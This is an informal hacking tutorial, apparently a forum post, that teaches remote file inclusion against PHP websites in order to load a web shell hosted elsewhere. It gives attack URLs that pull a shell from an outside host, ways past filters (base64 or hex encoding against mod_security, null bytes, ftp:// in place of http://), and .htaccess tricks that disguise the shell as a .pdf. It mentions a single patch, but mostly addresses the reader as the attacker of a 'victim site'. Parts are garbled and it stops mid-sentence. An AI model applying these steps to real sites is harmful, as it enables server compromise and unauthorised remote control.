About remote file inclusion |RFI|

about remote file inclusion |RFI|

remote file inclusion is where you include a remote file..usaully the file you include will be for malicious purposes

backdoors

what is a backdoor

well your house has a front door...that usually is supposed to be welcoming
a backdoor doesnt look welcoming because people arent usually supposed to use it

a computer backdoor is a code/script that runs on a system with stealth
it allows hackers secret access to the affected system if it is setup up correctly
a backdoor usualy runs as a hidden proccess and will open various port and accept commands for the hacker that is using it

shell

what is a shell

there are many forms of shells..we will not be talking about sea shells today though
a shell on a system is a session/terminal that takes commands etc..like a mini command center
shells can be in php,java,c and other various languages

today i will explain a php shell is

a php shell is a script in php designed to take user inputted commands and browse files,execute commands,edit files,upload files,like a files manager
a php shell is executed via your web browser
eg...www.sites.com/shell.php?
the php shell gives you the same sort of access as if you were at that machine on the same account it is executed on..

remote file inclusion happens usually when someone make a php script and doesnt code it so that the script sanitizes the users input and there are no restrictions running on the server hosting the website with the vulnerable page

a vulnerable page's source code may have this in it

this would mean that

"page" without the quotes is the variable

so you would type

site.com/index.php?page=http://site.com/shell.txt?

note:it must be .txt in extension on server otherwise it will run on the other server where the remote file is located

also rfi wont work if url fopen or url include is disabled or if the page is patched

in order to patch theor script in php they should replace

require($page . "faq.php");

with

require("faq.php");

and then the script cant take user input through the url

also if there is mod_security enabled try encoding the shell link in base 64 or hex code

and for scripts that dont fully sanitise the user input but do check to a certain extent

use the nullbyte trick at the very end of the url

eg:

site.com/index.php?page=http://site.com/shell.txt?

well if there is anything i missed.tell me

edit:
thought of 2 i forgot myself

some filters filter out http:// so try ftp:// instead
so instead of using the http protocal use the ftp protocal

also try converting the shells link to binary
eg

site.com/index.php?page=binary string

---------updated

okies this is just small a update

sometimes a site may have in its code some security code to make it so that the file MUST have an extension of .html or somethinng or .pdf

so if you atacked

127.0.0.1index.php?page=document.pdf

and changed the document.pdf to your shell link

127.0.0.1index.php?page=http://shell.com/shell.txt?

and got an error like this

warning: failed for inclusion http://site.com/shell.txt.pdf? blah blah blah

notice your input was shell.txt and it tried including a file called shell.txt.pdf

then you would goto your shell host and create a rule with a .htaccess file with the following code

AddType application/octect-stream pdf

you could also make it show the php file as a text file by using

AddType text/plain pdf

save this as a .htaccess file with 1 of the 2 codes above

anyways now lets get to the interesting part

now lets remember your php shell must end in a .pdf extension but show as a txt file

so rename your file shell.txt to shell.pdf

now goto your victim site and dont include the extension,let the php code do the work for ya;) teamwork is always usefull

and use